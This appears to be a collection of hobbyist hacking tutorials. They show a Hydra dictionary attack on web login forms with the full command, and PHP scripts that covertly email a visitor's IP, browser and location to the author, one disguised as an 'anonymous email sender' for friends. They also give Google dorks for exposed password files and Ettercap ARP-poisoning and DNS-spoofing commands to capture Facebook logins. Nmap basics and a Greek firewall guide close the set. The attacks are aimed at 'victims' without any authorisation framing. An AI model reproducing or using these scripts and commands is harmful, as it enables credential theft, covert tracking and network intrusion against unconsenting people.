Hydra THC web form dictionary attack

Hello ,

In this tutorial i will show you how to use THC hydra for performing a dictionary attack against a web form.For example username,password form.

THC hydra is a powerful program that you can find it at Backtack OS.With Hydra you can perform a dictionary attack against http form,smb,routers and more.

#Step 1) So to start the attack you have to find a good wordlist.Wordlist is a txt/lst file with many complex word inside.(A good wordlist contains numbers,characters,letters).You can download a wordlist from the web or you can make your own wordlist.(Recommended).So download crunch(Wordlist creator from here install it go to the installation folder (crunch-3.3)and run the following command

cd crunch-3.3/

and then run:

./crunch 1 5 0123456789 > /root/Desktop/wordlist.txt

Your screen should look like this now

  

 

#Step 2)So once the wordlist is ready you have to run hydra thc and execute the attack.
Open hydra (Backtrack > Privilege Escalation > Password Attack > Online Attacks > hydra )

#Step 3)Now go to the login page of the target/site > right click > View page source , to view the source code of the forms.
You will see something like this(but of course different and not exactly like the following):

<form name="input" action="kwd.php" method="post">
Username:
<input type="text" name="user">


Password:
<input type="password" name="pass">

 
Just write the action page,the method,the username name and the password name in to a txt file to remember them.
Now before we finish we have to make a try with random password and username to take an error.(Don't forget to write the error message in the txt file.)Like this:

(In this case the error message/Wrong login  is ACCESS DENIED).

Now it's time to perform the attack.Once we know the Username name the paswword name the action page and the method we are ready!

Now go to the hydra window (have a look at step 2 again) and type the following command

hydra www.site.com  http-form-post "/directory:user=^USER^&pass=^PASS^:ERROR MESSAGE" -L /root/Desktop/wordlist.txt -P /root/Desktop/wordlist.txt -t 10 -w 30 -o /root/Desktop/attack.txt




You  have to change the "www.site.com" with the target's site,  the /directory
 with the login page directory e.g index/Login.php  the user with the username name of the site(Step 3) ,the pass with the password name of the site(Step 3) and the ERROR MESSAGE with the error message that the target gives you.In this case "ACCESS DENIED" e.g "Wrong username or Password" .

Thank you!

Nikos Danopoulos

Finding IPs via Gmail and with your own Php code!

Hello there:)

Today i will show you a tutorial about how to find an IP with Gmail and with your own Php code.First of all Php is a script language and you can find more about it here.There are many tutorials in the web too.

So, lets start. First of all you have to login you gmail account.If you don't have one just create one!(Very simple).
Second step is to find the hoobies of the target to send a realistic message.We only have to google his/her name or to read the 'About' choise at Facebook.
Now you have to send an email to the target and just wait for her/his reply!

Your screen should look like this....

Now open the 'Down button' as you can see in the following picture.

and just press the 'Show original'.Now you will see  the following...

You can easy see the ip after 'Received: by....'

 So you have found your targets ip!Congrats.

One more popular way to find an Ip is to make a script(8 lines) upload it to your webhost and then send the link to the target.Here is how you can do it.

First of all access your webhost account(I use 000webhost webhost,it is very good and free).Then make a file with the name news.php . Edit it an write the following code into the file.

<?php

$ip=$_SERVER['REMOTE_ADDR'];
$to='youremail ';
$from='me@gmail.com';
$subject='Ip';
$message=$ip;

mail($to,$subject,$message,$from);

?>Code explaination:
1line: Opening php
2line: We are telling to the programm that the parametr $ip is the ip of the visitor (target)
3line: $to parametr is your email
4line:$from parametr is the email sender name(me@gmail.com)
5line:$subject is the email's subject(Ip)
6line:$message is the email's message.In this case the message is the ip.
7line:Sending email...
8line:Closing program

Then send the link to your target.(www.domain.com/news.php).When he click it you will receive a message to your email account with his ip!

Your message!!

*IF you are using email account hotmail,you will receive the message to junks folder.


So,You have learned 2 ways for finding IPs.Enjoy it:)

Thank you,

Nikos Danopoulos

How can google dorks help us for performing web attacks

Welcome,
There are many times which a hacker is at home and ... trying to dinf sometrhing interesting to do.
Here a simple tutorial about how we can exploit google with some useful google dorks.If you don't know what google dorks are just read the following lines.

With google dorks you can find many vulnerabilities via searching on google.You type some specific commands in google search bar and then you can find some vulnerabilitites to many sites for many different vulns.

So have a look:

The following command is searching in Index Of of a site for 'phpinfo.php' file..

intitle:"Index of" phpinfo.php  

You will see something like this in your screen

check the screenshot
We have found a file 'phpinfo.php'
in Index Of of a site...


You can also check the Apache version...It's an information!







So it's time to make a try for finding sqli vulnerabilities(Sqli Wikipedia)

There are some simple commands you can 'run' for finding sqli vulnerabilities.

ext:sql intext:@gmail.com intext:25d55ad283aa400af464c76d713c07ad

With this command we are searching for sql vulnerability ,we are searching for @gmail.com in the page and finally we are searching for 25d55ad283aa400af464c76d713c07ad which is an encrypted hash(12345678)

Also you can search for 'ext:sql intext:"INSERT INTO" intext:@gmail.com intext:password'

which is searching for INSER INTO in a webpage , for a gmail account and for password.You can replace gmail with hotmail/live/windowslive/yahoo and more.

So the most common dorks are 'inurl' which is searching for a keyword in the url, 'intext' which is searching for a text lines/keywords in the whole webpage , 'intitle' which is searching for a keyword in the webpage title, 'filetype' which is searching for a specific file type like .pdf .exe and more.You can use them for many reasons.They are very useful too..


So the final exaple is an example for 'Password files dorks'

Here are some dorks:
allinurl: auth_user_file.txt <=== This Dork is searching for auth_user_file.txt 

  filetype: xls inurl: "password.xls" <===This dork is searching for a file 'password.xls' 
        intitle:index.of pwd.db <== searching for password databases
  index.of passlist.txt <=== searching for password list

There are many more.Just make a complex of keywords and use them.

Thank you

Nikos Danopoulos

Php anonymous email sender and information gathering.Ohh yes!

Hello,Good morning!
Today (Sun Apr 22) you will see a powerful php script and html code for making 2 pages.The first page is an anonymous email sender,so you can send any email in all over the world with any email-name!
The second page is a page which collects all the information about the email sender.

Ok here is a few-lines story!
I give the email sender to a friend and i tell him/her "Hey this is an anonymous email sender.You can send mails everywhere!And of course with no name or with a fake name!Just open it".Let's say that your friend open the link and send an email...Then you will receive an email with the victims ip,location(city,region_name),his operating system(e.g Windows,Linux),his web browser(e.g Firfox,Opera,IE,Icweasel,Google Chrome),the victim which your friend sent the email and more.

Ok  let's starts now.First of all you have to have a web host(I suggest you 000webhost(www.000webhost.com) or ripway(www.ripway.com)).They are both free.Now go to Desktop and make a new document.Open it and write into the fil the following code:

<html>
<body style="background-color:black">
<title>Email Anonymous Sender</title>
<form method="post" action="aaa.php">
<p style="font-style:italic;color:white">Victim's Email:<input type="text"name="email"></p>
<p style="font-style:italic;color:white">Subject:<input type="text"name="subject"></p>
<p style="font-style:italic;color:white">Message:<textarea name="message" rows="5" cols="55"></textarea>
<p style="font-style:italic;color:white">Your's Email:<input type="text"" name="myemail"></p>
<input type="submit" value="Submit"/>
<input type="reset" value="Erase All"/>
</form>









Ok now click on "save" and save it as "email.php"(WARNING:the name of the page is very important!Don't rename the page)

Now let's make the second page

Make a new document and type into the following code:
<?php
$ip=$_SERVER['REMOTE_ADDR'];
$browser=$_SERVER['HTTP_USER_AGENT'];
$br=$_SERVER['REMOTE_USER'];
$to=$_POST["email"];
$subject=$_POST["subject"];
$message=$_POST["message"];
$from=$_POST["myemail"];
$head="From:" . $from;
mail($to,$subject,$message,$head);
$mss="Ip:" . $ip;
$me="example@gmail.com";
$host="host info";
$json = json_decode(file_get_contents('http://freegeoip.net/json/'.$ip));
$region_name = !empty($json->region_name) ? $json->region_name : 'Unknown City';
$city =!empty($json->city)?$json->city:'Unknown City';
mail($me,$host,$mss . "," . "Victim's info:" . $browser . "" . "Location:" . $region_name . ":" . $city);
?>    

<html>
<body style="background-color:black">
<h1 style="color:green">Let the games begin;) </h1>
<img src="https://encrypted-tbn3.google.com/images?q=tbn:ANd9GcSShwOxeW3aKl4VnV4cVMFE45ndqORlURwyxXl8ejE7x_UGS5O7" alt style="color:white"That's how you look now.."/>
</html>
 

As you can see i have colored one of the red lines green.This is because you have to put your email there instead of "example@gmail.com"
Ok now save this document as "aaa.php".So,now we are ready.

Go to your webhost(i use 000webhost) and go to file manager.Then select "public_html" and click on the button"upoload".Now you have to upload the files you made before.Just select them and click upload(If you are using 000webhost don't forget to click the "check" icon").






Ok now make a new tab with your web browser and type the following "mysite.net.76.net/email.php" (Be careful!Instead of mysite.net.76.net type in your website!)

Now send an email for testing.Just type your email in the Victim's Email and send an email.
Now go to your email an you will see something like this.

There are your information.The ip,th web browser,your location,your oprating system and more!Now your are ready to send it to a friend and have some fun!
Thank you,
Nikos Danopoulos

Tut04:Ettercap(Scanning,attacking)

Hey!
With the following tutorial you will learn many thinks about ettercap.For example how to run an arp attack and how to scan for hosts and more.
Ok let's start.
First of all you have to download ettercap.Just be root(su) and then download ettercap with the following command apt-get install ettercap.
Before you start using ettercap you must learn what ettercap is!
Ettercap is a very powerful tool for mitm attacks(man-in-the-middle attacks)(http://en.wikipedia.org/wiki/Man-in-the-middle_attack).With ettercap you can do many tricks.For example sniffing on your network,dsn spoofing and more.

Now you are ready to see how ettercap works!

First of all open you terminal.Type "su" and your password to be root.

Here is a simple command for ettercap.

ettercap -T  -M arp:remote -i wlan0 /192.168.1.1/ // -P remote_browser

Ok.Let's see what does this code do.
First of all with command "ettercap" we call ettercap to run.Then with the -T command is starting ettercap in a text-mode.
The -M command starts the Mitm(man in the middle) attack and the arp:remote is the kind of the poisoning.
The -i is the interface.Mine interface is eth1 but the yours may be wlan0(as on the example).
The /192.168.1.1/ // attacks at IP's between 192.168.1.1 to 192.168.1.254.
Finally -P command calls the plugin you want.In this case "remote_browser" a plugin which allows you to see the visited sites.

Another example is with the famous plugin dns_spoof.
With dns_spoof you can redirect the victim at any website.

Step 1)In terminal type "cd /usr/share/ettercap/" and then "nano etter.dns" to open the ttercaps dns file and edit.

 By scrolling down you will see the following lines:

microsoft.com *.microsoft.com www.microsoft.com

A A PTR

198.182.196.56 198.182.196.56 198.182.196.56

Let's say that you want to redirect the victim from google to youtube.Just ping youtube by typing ping www.youtube.com in terminal and then change the etter.dns to
google.*   A   173.194.67.91
www.google.*   A  173.194.67.91
www.google.com  PTR 173.194.67.91

The press Ctrl+O to sav the changes and thn Ctrl+X to exit.
Now type in terminal ettercap -T -M arp:remote -i eth1 /192.168.1.1/ // -P dns_spoof and the victim will be redirected to youtube.

Also you can type  
facebook.*   A   your ip
www.facebook.*   A  your ip
www.facebook.com  PTR your ip

and if the victim connects to facebook,you will learn he's password and username:)

Tutorial03:Nmap in ourdays

What about playing with nmap?A powerful tool for scanning your network!
(http://nmap.org/)

Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in eight movies, including The Matrix Reloaded, Die Hard 4, and The Bourne Ultimatum.
Nmap is ...

• Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
• Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
• Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
• Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
• Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
• Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
• Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackersannouncement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel onFreenode or EFNet.
• Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
• Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (rout of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.

information are based on nmap official site(www.nmap.org)

Let the games begin!

First of all open your Terminal get root previleges and type "apt-get install nmap" 

Wait a couple of seconds and then you are ready for dive into nmap!

There two basic types of scanning with nmap tool.The first is -sT(TCP connect scanning) and -sS(SYN scanning)

You can run this scans by typing in Terminal "nmap -sT [targets ip]" or "nmap -sS [targets ip]"

You can also make Ping scan by typing this "nmap -sP [targets ip]" .With pinging a target actually you are sending an ICMP request packet  to the target.If ICMP REPLY received the target is up,nmap will print on your terminal that your target is up.If you dont receive and ICMP REPLY ,means that target is down.

A very useful nmap command is also the -sV which collect information about a service in a port  including the product name and version number.There is also the -sA(checks if a port is filterd or not) and the -O(Finds the OS of the target)

If you are "alergical" with terminal and command line you can use the -iL<file> command.This command allows you to make a fil(txt file) and write into the ip of the targets.The by typing in terminal    nmap -iL filename.txt ,nmap will read the input from the file!

There are some example of the well-known nmap commands:

-sP

 1 [chaos]# nmap -sP 10.0.0.0/24

   2 
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
   4         2006-07-14 14:19 BST
   5 Host 10.0.0.1 appears to be up.
   6 MAC Address: 00:09:5B:29:FD:96 (Netgear)
   7 Host 10.0.0.2 appears to be up.
   8 MAC Address: 00:0F:B5:96:38:5D (Netgear)
   9 Host 10.0.0.4 appears to be up.
  10 Host 10.0.0.5 appears to be up.
  11 MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
  12 Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds

2)

-A(os fingrprinting) , -sS

1 [chaos]# nmap -sS -A 10.0.0.1
   2 
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
   4         2006-07-14 14:23 BST
   5 Insufficient responses for TCP sequencing (0),
   6         OS detection may be less accurate
   7 Interesting ports on 10.0.0.1:
   8 (The 1671 ports scanned but not shown below are in state:
   9         closed)
  10 PORT   STATE SERVICE    VERSION
  11 80/tcp open  tcpwrapped
  12 MAC Address: 00:09:5B:29:FD:96 (Netgear)
  13 Device type: WAP
  14 Running: Compaq embedded, Netgear embedded
  15 OS details: WAP: Compaq iPAQ Connection Point or
  16         Netgear MR814
  17 
  18 Nmap finished: 1 IP address (1 host up) scanned in
  19         3.533 seconds

Tutorial02:Dive into Firestarter

 Μόλις είδατε απο το προηγούμνο tutorial τις φανταστικές κατα την γνώμη μου λειτουργίες του καινούργιου σας Firewall!

Δεν πιστεύετε και εσείς πως είναι ώρα να εμβαθύνουμε?"The well known as dive into firewall!"

 Το μόνο που μένει ειναι να πλογηθούμε στο μενού *του*  Debian απλά πατώντας Applications>Internet>Firestarter και θα δείτε το Firestarter να τρέχει.

Στο Firewall status πάνω-πάνω μπορούμε να καταλάβουμε αν το Firestarter τρέχει κανονικά.Αμέσως απο κάτω στο Network μπορούμε να καταλάβουμε τη interface έχουμε.Δίπλα ακριβώς μπορούμε να δούμε τα πακέτα που είσερχονται και εξέρχονται απο τον Υπολογιστή μας.Τέλος φαίνονται οι ενεργές συνδέσεις μας,οι πόρτες που τρέχουν ,τα Destinations αλλα και φυσικά τα Services και τα προγράμματα που εκτελούν το service!

Για να δούμε ομως και τις άλλες καρτέλες!

Η καρτέλα Events η οποία βρίσκεται στην κορυφή του  Firestarter μας δείχνει ό,τι γίνεται μέσα στο δίκτυο και πιοιες λειτουργίες θεωρούντε επικίνδυνες,οι οποίες έχουν μπλοκαριστεί απο τον Firestarter.Aκόμα σε περίπτωση που κάποιος επιχειρήσει να σας επιτεθεί(για παράδειγμα port scanning,όχι μόνο δεν θα μπορέσει να τρέχει την επίθεση αλλα και το Firestarter θα σας ενημερώσει κατευθείαν εμφανίζοντάς σας ενα εικονίδιο στην κορυφή της οθόνης σας!

Τέλος στην καρτέλα Policy μας δίνετε η δυνατότητα να "προσθέσουμε κανόνα",για παράδειγμα να ανοίξουμε μια πόρτα,κάτι που *δεν* θα συνηστούσα!